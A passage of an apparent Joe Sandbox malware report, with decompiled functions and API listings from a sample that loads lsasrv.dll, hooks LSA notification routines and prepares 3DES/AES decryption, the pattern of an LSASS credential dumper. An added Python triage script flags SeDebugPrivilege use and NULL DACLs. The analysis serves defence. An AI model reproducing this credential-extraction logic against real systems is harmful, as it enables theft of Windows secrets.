      • Part of subcall function 00F61DF3: LocalFree.KERNEL32(?), ref: 00F61EF0
    • LocalFree.KERNEL32(?,?,?,?,00F61CD3), ref: 00F61D19
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd

    Non-executed Functions

    C-Code - Quality: 97%
    			E00F62566() {
    				intOrPtr _t1;
    				struct HINSTANCE__* _t5;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t19;
    				struct HINSTANCE__* _t21;
    				intOrPtr _t22;
    				intOrPtr _t23;
    				intOrPtr _t24;
    				intOrPtr _t25;
    				intOrPtr _t26;
    				intOrPtr _t27;
    				intOrPtr _t28;
    				intOrPtr _t29;
    
    				_t18 =  *0xf6bd14; // 0x0
    				if(_t18 >= 0) {
    					L14:
    					_t1 =  *0xf6bd14; // 0x0
    					return _t1;
    				}
    				_t19 =  *0xf6cd44; // 0x74e70000
    				if(_t19 != 0) {
    					L4:
    					_t22 =  *0xf6cd48; // 0x74e72c72
    					if(_t22 != 0) {
    						_t23 =  *0xf6cd4c; // 0x74e720d4
    						if(_t23 != 0) {
    							_t24 =  *0xf6cd50; // 0x74e71ca7
    							if(_t24 != 0) {
    								_t25 =  *0xf6cd54; // 0x74e71fbc
    								if(_t25 != 0) {
    									_t26 =  *0xf6cd58; // 0x74e7195c
    									if(_t26 != 0) {
    										_t27 =  *0xf6cd5c; // 0x74e718b8
    										if(_t27 != 0) {
    											_t28 =  *0xf6cd60; // 0x74e71f40
    											if(_t28 != 0) {
    												_t29 =  *0xf6cd64; // 0x74e72391
    												if(_t29 != 0) {
    													 *0xf6bd14 = E00F626BA();
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					L13:
    					goto L14;
    				}
    				_push(L"bcrypt");
    				_t5 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LoadLibraryW"))();
    				 *0xf6cd44 = _t5;
    				if(_t5 == 0) {
    					goto L13;
    				}
    				 *0xf6cd48 = GetProcAddress(_t5, "BCryptOpenAlgorithmProvider");
    				 *0xf6cd4c = GetProcAddress( *0xf6cd44, "BCryptSetProperty");
    				 *0xf6cd50 = GetProcAddress( *0xf6cd44, "BCryptGetProperty");
    				 *0xf6cd54 = GetProcAddress( *0xf6cd44, "BCryptGenerateSymmetricKey");
    				 *0xf6cd58 = GetProcAddress( *0xf6cd44, "BCryptEncrypt");
    				 *0xf6cd5c = GetProcAddress( *0xf6cd44, "BCryptDecrypt");
    				 *0xf6cd60 = GetProcAddress( *0xf6cd44, "BCryptDestroyKey");
    				 *0xf6cd64 = GetProcAddress( *0xf6cd44, "BCryptCloseAlgorithmProvider");
    				_t21 =  *0xf6cd44; // 0x74e70000
    				if(_t21 == 0) {
    					goto L13;
    				}
    				goto L4;
    			}

    0x00f62569
    0x00f6256f
    0x00f6268d
    0x00f6268d
    0x00f62693
    0x00f62693
    0x00f62576
    0x00f6257c
    0x00f62642
    0x00f62642
    0x00f62648
    0x00f6264a
    0x00f62650
    0x00f62652
    0x00f62658
    0x00f6265a
    0x00f62660
    0x00f62662
    0x00f62668
    0x00f6266a
    0x00f62670
    0x00f62672
    0x00f62678
    0x00f6267a
    0x00f62680
    0x00f62687
    0x00f62687
    0x00f62680
    0x00f62678
    0x00f62670
    0x00f62668
    0x00f62660
    0x00f62658
    0x00f62650
    0x00f6268c
    0x00000000
    0x00f6268c
    0x00f62582
    0x00f625a0
    0x00f625a2
    0x00f625a9
    0x00000000
    0x00000000
    0x00f625c2
    0x00f625d4
    0x00f625e6
    0x00f625f8
    0x00f6260a
    0x00f6261c
    0x00f6262e
    0x00f62635
    0x00f6263a
    0x00f62640
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LoadLibraryW,bcrypt), ref: 00F62591
    • GetProcAddress.KERNEL32(00000000), ref: 00F6259E
    • GetProcAddress.KERNEL32(00000000,BCryptOpenAlgorithmProvider), ref: 00F625B5
    • GetProcAddress.KERNEL32(BCryptSetProperty), ref: 00F625C7
    • GetProcAddress.KERNEL32(BCryptGetProperty), ref: 00F625D9
    • GetProcAddress.KERNEL32(BCryptGenerateSymmetricKey), ref: 00F625EB
    • GetProcAddress.KERNEL32(BCryptEncrypt), ref: 00F625FD
    • GetProcAddress.KERNEL32(BCryptDecrypt), ref: 00F6260F
    • GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 00F62621
    • GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 00F62633
      • Part of subcall function 00F626BA: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,?,?,?,00F62687), ref: 00F62741
      • Part of subcall function 00F626BA: GetProcAddress.KERNEL32(00000000,?,?,?,?,00F62687), ref: 00F6274A
      • Part of subcall function 00F626BA: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,?,?,?,00F62687), ref: 00F627C0
      • Part of subcall function 00F626BA: GetProcAddress.KERNEL32(00000000,?,?,?,?,00F62687), ref: 00F627C3
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
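The "APIs" bullets that Joe Sandbox prints under each function (the RtlAdjustPrivilege / SetSecurityDescriptorDacl block earlier in this listing, and the bcrypt.dll resolution block directly above) are the quickest material to triage from a report like this one. The following is an added example, not Joe Sandbox tooling and not code from the analysed sample: it parses bullets in exactly this report's format and applies a few hypothetical triage rules. The sample lines are copied from the listings on this page; the constant 0x14 is the documented LUID value of SeDebugPrivilege, and the rule names, thresholds and wording of the findings are this example's own choices.

```python
"""Triage the per-function "APIs" bullets of a Joe Sandbox HCA report.
Added example; not part of Joe Sandbox or of the analysed sample.
The rules are a hypothetical starting point, not a vendor signature."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One bullet of an "APIs" list, e.g.
#   • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000001), ref: 00F620FA
#   • Part of subcall function 00F61FEC: CloseHandle.KERNEL32(FFFFFFFF), ref: 00F62139
#   • _wcslen.LIBCMT ref: 00F65349          (CRT call, no argument list shown)
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

SE_DEBUG_PRIVILEGE = 0x14  # SeDebugPrivilege LUID value as passed to RtlAdjustPrivilege


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # stack values exactly as the report prints them
    ref: int                   # call-site address
    subcall_of: Optional[int]  # enclosing function when reported as a subcall


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return every bullet that matches the report's API line format."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=[a.strip() for a in raw.split(",")] if raw else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def _as_int(value: str) -> Optional[int]:
    """Hex stack value -> int; '?' and text arguments give None.  Caveat: a text
    argument made only of hex letters would be misread as a number."""
    try:
        return int(value, 16)
    except ValueError:
        return None


def _int_arg(call: ApiCall, i: int) -> Optional[int]:
    return _as_int(call.args[i]) if i < len(call.args) else None


def flag_calls(calls: List[ApiCall]) -> List[str]:
    """Hypothetical triage rules; findings are returned in report order."""
    findings = []
    stack_strings = set()  # text the report captured on the stack of resolver calls
    for c in calls:
        if c.api in ("GetProcAddress", "GetModuleHandleW"):
            stack_strings.update(a for a in c.args if a != "?" and _as_int(a) is None)
        # RtlAdjustPrivilege(Privilege, Enable, CurrentThread, &WasEnabled)
        if (c.api == "RtlAdjustPrivilege" and _int_arg(c, 0) == SE_DEBUG_PRIVILEGE
                and _int_arg(c, 1) == 1):
            findings.append(f"{c.ref:08X}: RtlAdjustPrivilege enables SeDebugPrivilege "
                            "(0x14), the usual prelude to opening a protected process")
        # SetSecurityDescriptorDacl(pSD, bDaclPresent=1, pDacl=NULL, ...) -> NULL DACL
        if (c.api == "SetSecurityDescriptorDacl" and _int_arg(c, 1) == 1
                and _int_arg(c, 2) == 0):
            findings.append(f"{c.ref:08X}: SetSecurityDescriptorDacl installs a NULL DACL "
                            "(object accessible to everyone)")
    bcrypt = sorted(s for s in stack_strings if s.startswith("BCrypt"))
    if bcrypt:
        findings.append(f"dynamic import of {len(bcrypt)} bcrypt.dll exports: "
                        + ", ".join(bcrypt))
    if "LoadLibraryW" in stack_strings:
        findings.append("LoadLibraryW resolved through GetProcAddress, so the loader "
                        "call does not appear in the import table")
    return findings


# Sample input: bullets copied from the API listings in this report.
SAMPLE = """\
• RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000001), ref: 00F620FA
• CloseHandle.KERNEL32(FFFFFFFF), ref: 00F62139
  • Part of subcall function 00F61FEC: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00F62041
  • Part of subcall function 00F61FEC: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00F62065
• GetModuleHandleW.KERNEL32(kernel32,LoadLibraryW,bcrypt), ref: 00F62591
• GetProcAddress.KERNEL32(00000000,BCryptOpenAlgorithmProvider), ref: 00F625B5
• GetProcAddress.KERNEL32(BCryptSetProperty), ref: 00F625C7
• GetProcAddress.KERNEL32(BCryptEncrypt), ref: 00F625FD
• _wcslen.LIBCMT ref: 00F65349
"""

if __name__ == "__main__":
    for finding in flag_calls(parse_api_lines(SAMPLE)):
        print(finding)
```

The argument columns are whatever the sandbox saw on the stack at the call, so a value is a pointer, an integer or a string depending on the API; the rules above only read positions whose meaning is fixed by the documented prototype. Strings captured on GetModuleHandleW and GetProcAddress frames are collected together because, as the bcrypt block above shows, the export name often appears as a neighbouring stack slot rather than as the first argument.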
    C-Code - Quality: 89%
    			E00F62143(void* __ecx) {
    				intOrPtr _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				char _v48;
    				intOrPtr _v52;
    				void* _v60;
    				char _v68;
    				_Unknown_base(*)()* _v72;
    				_Unknown_base(*)()* _v76;
    				intOrPtr _v80;
    				char _v84;
    				intOrPtr _v88;
    				signed int _t55;
    				intOrPtr _t68;
    				intOrPtr* _t69;
    				intOrPtr _t72;
    				intOrPtr _t75;
    				_Unknown_base(*)()* _t76;
    				_Unknown_base(*)()* _t77;
    				void* _t80;
    				intOrPtr _t81;
    				struct HINSTANCE__* _t85;
    				void* _t89;
    				WCHAR* _t90;
    				intOrPtr _t98;
    				intOrPtr* _t100;
    				intOrPtr* _t101;
    				intOrPtr* _t102;
    				intOrPtr _t117;
    				signed int _t122;
    				void* _t124;
    				signed int _t126;
    				struct HINSTANCE__* _t127;
    				intOrPtr _t133;
    				intOrPtr _t137;
    
    				_t124 = (_t122 & 0xfffffff8) - 0x4c;
    				_v76 =  &_v68;
    				_v72 = 0xf6cd30;
    				_v80 = 7;
    				_t126 =  *0xf6bfb4; // 0xc0000225
    				if(_t126 >= 0) {
    					L25:
    					_t55 =  *0xf6bfb4; // 0xc0000225
    					return _t55;
    				}
    				_t127 =  *0xf6cd38; // 0x0
    				if(_t127 != 0) {
    					L3:
    					_v52 =  &_v60;
    					_v48 =  &_v24;
    					_v44 = 0;
    					RtlInitUnicodeString( &_v60, L"lsasrv.dll");
    					if(E00F619EE(0xf6cd30, E00F61D27,  &_v60) < 0 || _v52 == 0) {
    						goto L25;
    					} else {
    						_v48 = _v32;
    						_v44 = _v28;
    						_v40 = _v24;
    						if( *0xf6cfd4 < 0xece || _v20 >= 0x45d70a62) {
    							_t89 = 0;
    						} else {
    							_t89 = 1;
    						}
    						_t133 =  *0xf6cd40; // 0x0
    						if(_t133 != 0) {
    							L15:
    							_v84 = 0xf6bf80;
    							if(_t89 != 0) {
    								_v84 = 0xf6bf98;
    								_v88 = 0xb;
    							}
    							_push(0);
    							if(E00F6134E( &_v84, _v88,  &_v48) != 0) {
    								_t68 = _v36;
    								_t98 =  *((intOrPtr*)(7 + (0 | _t89 != 0x00000000) * 4 + _t68));
    								 *0xf6cf08 = _t98;
    								_t117 =  *((intOrPtr*)(0x16 + (0 | _t89 != 0x00000000) * 8 + _t68));
    								 *0xf6cf0c = _t117;
    								 *0xf6cf04 =  *((intOrPtr*)(0x1c + (0 | _t89 != 0x00000000) * 8 + _t68));
    								_t69 =  *((intOrPtr*)(0x27 + (0 | _t89 != 0x00000000) * 8 + _t68));
    								 *0xf6cf00 = _t69;
    								if(_t98 != 0 && _t117 != 0 &&  *0xf6cf04 != 0 && _t69 != 0) {
    									_push(0x100);
    									_push(0x40);
    									_t90 = L"kernel32";
    									 *_t69 = 0x100;
    									_t72 =  *(GetProcAddress(GetModuleHandleW(_t90), "LocalAlloc"))();
    									_t100 =  *0xf6cf0c; // 0x0
    									_push(0x90);
    									_push(0x40);
    									 *_t100 = _t72;
    									_t75 =  *(GetProcAddress(GetModuleHandleW(_t90), "LocalAlloc"))();
    									_t101 =  *0xf6cf04; // 0x0
    									 *_t101 = _t75;
    									_t102 =  *0xf6cf0c; // 0x0
    									if( *_t102 != 0 && _t75 != 0) {
    										 *0xf6bfb4 =  *0xf6bfb4 & 0x00000000;
    									}
    								}
    							}
    							goto L25;
    						} else {
    							_t76 = GetProcAddress( *0xf6cd38, "LsaICancelNotification");
    							_v72 = _t76;
    							if(_t76 != 0) {
    								_t77 = GetProcAddress( *0xf6cd38, "LsaIRegisterNotification");
    								_v76 = _t77;
    								if(_t77 != 0) {
    									_push(0);
    									_t80 = E00F6134E( &_v84, 8,  &_v48);
    									_t124 = _t124 + 0x10;
    									if(_t80 != 0) {
    										_t81 = _v36;
    										 *0xf6cd3c =  *((intOrPtr*)(_t81 + 0x6c));
    										 *0xf6cd40 =  *((intOrPtr*)(_t81 + 0x70));
    									}
    								}
    							}
    							_t137 =  *0xf6cd40; // 0x0
    							if(_t137 == 0) {
    								goto L25;
    							}
    							goto L15;
    						}
    					}
    				}
    				_push(L"lsasrv");
    				_t85 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LoadLibraryW"))();
    				 *0xf6cd38 = _t85;
    				if(_t85 == 0) {
    					goto L25;
    				}
    				goto L3;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LoadLibraryW,lsasrv), ref: 00F62193
    • GetProcAddress.KERNEL32(00000000), ref: 00F6219A
    • RtlInitUnicodeString.NTDLL(?,lsasrv.dll), ref: 00F621C9
      • Part of subcall function 00F619EE: RtlInitUnicodeString.NTDLL(?,00000000), ref: 00F61AC6
      • Part of subcall function 00F619EE: LocalFree.KERNEL32(00000000), ref: 00F61ADE
      • Part of subcall function 00F619EE: _wcsrchr.LIBCMT ref: 00F61B4E
      • Part of subcall function 00F619EE: RtlInitUnicodeString.NTDLL(?,-00000002), ref: 00F61B5D
      • Part of subcall function 00F619EE: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61C39
      • Part of subcall function 00F619EE: GetProcAddress.KERNEL32(00000000), ref: 00F61C40
      • Part of subcall function 00F619EE: LocalFree.KERNEL32(?), ref: 00F61C88
    • GetProcAddress.KERNEL32(LsaICancelNotification), ref: 00F6223C
    • GetProcAddress.KERNEL32(LsaIRegisterNotification), ref: 00F62251
      • Part of subcall function 00F6134E: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F613FB
      • Part of subcall function 00F6134E: GetProcAddress.KERNEL32(00000000), ref: 00F61402
      • Part of subcall function 00F6134E: LocalFree.KERNEL32(?), ref: 00F6144F
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000100), ref: 00F6235F
    • GetProcAddress.KERNEL32(00000000), ref: 00F62362
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000090), ref: 00F6237B
    • GetProcAddress.KERNEL32(00000000), ref: 00F6237E
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1689369576.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000002.1689363080.00F60000.00000002.sdmp
    • Associated: 00000005.00000002.1689377239.00F68000.00000002.sdmp
    • Associated: 00000005.00000002.1689384429.00F6B000.00000004.sdmp
    • Associated: 00000005.00000002.1689391890.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_f60000_F915.jbxd
    APIs
      • Part of subcall function 00F64593: EncodePointer.KERNEL32(00000000,00F67272,00F6C038,00000314,00000000,?,?,?,?,?,00F65134,00F6C038,Microsoft Visual C++ Runtime Library,00012010), ref: 00F64595
    • LoadLibraryW.KERNEL32(USER32.DLL,00F6C038,00000314,00000000), ref: 00F67287
    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 00F672A3
    • EncodePointer.KERNEL32(00000000), ref: 00F672B4
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00F672C1
    • EncodePointer.KERNEL32(00000000), ref: 00F672C4
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00F672D1
    • EncodePointer.KERNEL32(00000000), ref: 00F672D4
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00F672E1
    • EncodePointer.KERNEL32(00000000), ref: 00F672E4
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00F672F5
    • EncodePointer.KERNEL32(00000000), ref: 00F672F8
    • DecodePointer.KERNEL32(00000000,00F6C038,00000314,00000000), ref: 00F6731A
    • DecodePointer.KERNEL32 ref: 00F67324
    • DecodePointer.KERNEL32(?,00F6C038,00000314,00000000), ref: 00F67363
    • DecodePointer.KERNEL32(?), ref: 00F6737D
    • DecodePointer.KERNEL32(00F6C038,00000314,00000000), ref: 00F67391
      • Part of subcall function 00F65F8E: IsDebuggerPresent.KERNEL32 ref: 00F67957
      • Part of subcall function 00F65F8E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6796C
      • Part of subcall function 00F65F8E: UnhandledExceptionFilter.KERNEL32(00F698EC), ref: 00F67977
      • Part of subcall function 00F65F8E: GetCurrentProcess.KERNEL32(C0000409), ref: 00F67993
      • Part of subcall function 00F65F8E: TerminateProcess.KERNEL32(00000000), ref: 00F6799A
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 26%
    			E00F626BA() {
    				char _v40;
    				char _v108;
    				intOrPtr _t10;
    				void* _t18;
    				void* _t23;
    				void* _t24;
    				WCHAR* _t25;
    
    				_t23 =  *0xf6cd48(0xf6cef0, L"3DES", 0, 0);
    				if(_t23 < 0) {
    					L8:
    					return _t23;
    				}
    				_t23 =  *0xf6cd4c( *0xf6cef0, L"ChainingMode", L"ChainingModeCBC", 0x20, 0);
    				if(_t23 < 0) {
    					goto L8;
    				}
    				_t23 =  *0xf6cd50( *0xf6cef0, L"ObjectLength", 0xf6cefc, 4,  &_v40, 0);
    				if(_t23 < 0) {
    					goto L8;
    				}
    				_t25 = L"kernel32";
    				_t10 =  *(GetProcAddress(GetModuleHandleW(_t25), "LocalAlloc"))();
    				 *0xf6cef8 = _t10;
    				_t23 =  *0xf6cd48(0xf6ced0, L"AES", 0, 0, 0x40,  *0xf6cefc, _t24, _t18);
    				if(_t23 >= 0) {
    					_t23 =  *0xf6cd4c( *0xf6ced0, L"ChainingMode", L"ChainingModeCFB", 0x20, 0);
    					if(_t23 >= 0) {
    						_t23 =  *0xf6cd50( *0xf6ced0, L"ObjectLength", 0xf6cedc, 4,  &_v108, 0);
    						if(_t23 >= 0) {
    							_push( *0xf6cedc);
    							_push(0x40);
    							 *0xf6ced8 =  *(GetProcAddress(GetModuleHandleW(_t25), "LocalAlloc"))();
    						}
    					}
    				}
    				goto L8;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,?,?,?,00F62687), ref: 00F62741
    • GetProcAddress.KERNEL32(00000000,?,?,?,?,00F62687), ref: 00F6274A
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?,?,?,?,00F62687), ref: 00F627C0
    • GetProcAddress.KERNEL32(00000000,?,?,?,?,00F62687), ref: 00F627C3
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 69%
    			E00F61FEC(WCHAR* _a4) {
    				struct _SECURITY_ATTRIBUTES _v12;
    				struct _SECURITY_DESCRIPTOR* _t11;
    				void* _t19;
    				void* _t21;
    				signed int _t24;
    				signed int _t25;
    
    				asm("stosd");
    				asm("stosd");
    				_t21 = 3;
    				asm("stosd");
    				_t25 = _t24 | 0xffffffff;
    				_v12.nLength = 0xc;
    				_v12.bInheritHandle = 0;
    				_t11 = HeapAlloc(GetProcessHeap(), 8, 0x14);
    				_v12.lpSecurityDescriptor = _t11;
    				if(_t11 != 0 && InitializeSecurityDescriptor(_t11, 1) != 0 && SetSecurityDescriptorDacl(_v12.lpSecurityDescriptor, 1, 0, 0) != 0) {
    					while(1) {
    						_t21 = _t21 - 1;
    						_t25 = CreateFileW(_a4, 0xc0000000, 0,  &_v12, 3, 0, 0);
    						if(_t25 != 0xffffffff) {
    							break;
    						}
    						_t19 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "GetLastError"))();
    						_push(0xbb8);
    						if(_t19 == 0xe7) {
    							if(WaitNamedPipeW(_a4, ??) != 0) {
    								goto L8;
    							}
    						} else {
    							Sleep();
    							L8:
    							if(_t21 != 0) {
    								continue;
    							}
    						}
    						break;
    					}
    				}
    				return _t25;
    			}

    APIs
    • GetProcessHeap.KERNEL32 ref: 00F62013
    • HeapAlloc.KERNEL32(00000000), ref: 00F6201A
    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00F6202F
    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 00F62041
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00F62065
    • GetModuleHandleW.KERNEL32(kernel32,GetLastError), ref: 00F6207C
    • GetProcAddress.KERNEL32(00000000), ref: 00F62083
    • Sleep.KERNEL32(00000BB8), ref: 00F62093
    • WaitNamedPipeW.KERNEL32(?,00000BB8), ref: 00F6209F
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 78%
    			E00F64FF7(void* __edx, void* _a4) {
    				signed int _v8;
    				struct HINSTANCE__* _v9;
    				void _v508;
    				long _v512;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t18;
    				signed int _t23;
    				short _t28;
    				void* _t32;
    				void* _t34;
    				void* _t37;
    				long _t38;
    				void* _t39;
    				struct HINSTANCE__* _t40;
    				void* _t52;
    				long _t53;
    				void* _t54;
    				signed int _t55;
    				void* _t56;
    				void* _t57;
    
    				_t52 = __edx;
    				_t18 =  *0xf6b940; // 0xbb40e64e
    				_v8 = _t18 ^ _t55;
    				_t54 = _a4;
    				_t53 = E00F64FD1(_t54);
    				_t40 = 0;
    				_v512 = _t53;
    				if(_t53 != 0) {
    					if(E00F67578(3) == 1 || E00F67578(3) == 0 &&  *0xf6b000 == 1) {
    						_t54 = GetStdHandle(0xfffffff4);
    						if(_t54 != _t40 && _t54 != 0xffffffff) {
    							_t23 = 0;
    							while(1) {
    								 *((char*)(_t55 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t53 + _t23 * 2));
    								if( *((intOrPtr*)(_t53 + _t23 * 2)) == _t40) {
    									break;
    								}
    								_t23 = _t23 + 1;
    								if(_t23 < 0x1f4) {
    									continue;
    								}
    								break;
    							}
    							_v9 = _t40;
    							_t20 = WriteFile(_t54,  &_v508, E00F66C20( &_v508),  &_v512, _t40);
    						}
    					} else {
    						if(_t54 != 0xfc) {
    							_t53 = 0xf6c038;
    							_t28 = E00F67515(0xf6c038, 0x314, L"Runtime Error!\n\nProgram: ");
    							_t57 = _t56 + 0xc;
    							if(_t28 != 0) {
    								_push(_t40);
    								_push(_t40);
    								_push(_t40);
    								_push(_t40);
    								_push(_t40);
    								goto L9;
    							} else {
    								_t54 = 0xf6c06a;
    								 *0xf6c272 = _t28;
    								_t38 = GetModuleFileNameW(_t40, 0xf6c06a, 0x104);
    								_t40 = 0x2fb;
    								if(_t38 == 0) {
    									_t39 = E00F67515(0xf6c06a, 0x2fb, L"<program name unknown>");
    									_t57 = _t57 + 0xc;
    									if(_t39 != 0) {
    										L8:
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										L9:
    										E00F64BDF();
    									}
    								}
    							}
    							if(E00F674FA(_t54) + 1 > 0x3c) {
    								_t40 = _t40 - (0xf6bff4 + E00F674FA(_t54) * 2 - _t54 >> 1);
    								_t37 = E00F6742D(0xf6bff4 + E00F674FA(_t54) * 2, _t40, L"...", 3);
    								_t57 = _t57 + 0x14;
    								if(_t37 != 0) {
    									goto L8;
    								}
    							}
    							_t54 = 0x314;
    							_t32 = E00F673B8(_t53, 0x314, L"\n\n");
    							_t57 = _t57 + 0xc;
    							if(_t32 != 0) {
    								goto L8;
    							}
    							_t34 = E00F673B8(_t53, 0x314, _v512);
    							_t57 = _t57 + 0xc;
    							if(_t34 != 0) {
    								goto L8;
    							}
    							_t20 = E00F6724C(_t52, _t53, L"Microsoft Visual C++ Runtime Library", 0x12010);
    						}
    					}
    				}
    				return E00F65F8E(_t20, _t40, _v8 ^ _t55, _t52, _t53, _t54);
    			}

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,00F6C06A,00000104,00000001,00000000,00000000), ref: 00F65093
      • Part of subcall function 00F64BDF: GetCurrentProcess.KERNEL32(C0000417), ref: 00F64BF5
      • Part of subcall function 00F64BDF: TerminateProcess.KERNEL32(00000000), ref: 00F64BFC
    • _wcslen.LIBCMT ref: 00F650C2
    • _wcslen.LIBCMT ref: 00F650CF
      • Part of subcall function 00F6724C: LoadLibraryW.KERNEL32(USER32.DLL,00F6C038,00000314,00000000), ref: 00F67287
      • Part of subcall function 00F6724C: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 00F672A3
      • Part of subcall function 00F6724C: EncodePointer.KERNEL32(00000000), ref: 00F672B4
      • Part of subcall function 00F6724C: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00F672C1
      • Part of subcall function 00F6724C: EncodePointer.KERNEL32(00000000), ref: 00F672C4
      • Part of subcall function 00F6724C: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00F672D1
      • Part of subcall function 00F6724C: EncodePointer.KERNEL32(00000000), ref: 00F672D4
      • Part of subcall function 00F6724C: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00F672E1
      • Part of subcall function 00F6724C: EncodePointer.KERNEL32(00000000), ref: 00F672E4
      • Part of subcall function 00F6724C: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00F672F5
      • Part of subcall function 00F6724C: EncodePointer.KERNEL32(00000000), ref: 00F672F8
      • Part of subcall function 00F6724C: DecodePointer.KERNEL32(00000000,00F6C038,00000314,00000000), ref: 00F6731A
      • Part of subcall function 00F6724C: DecodePointer.KERNEL32 ref: 00F67324
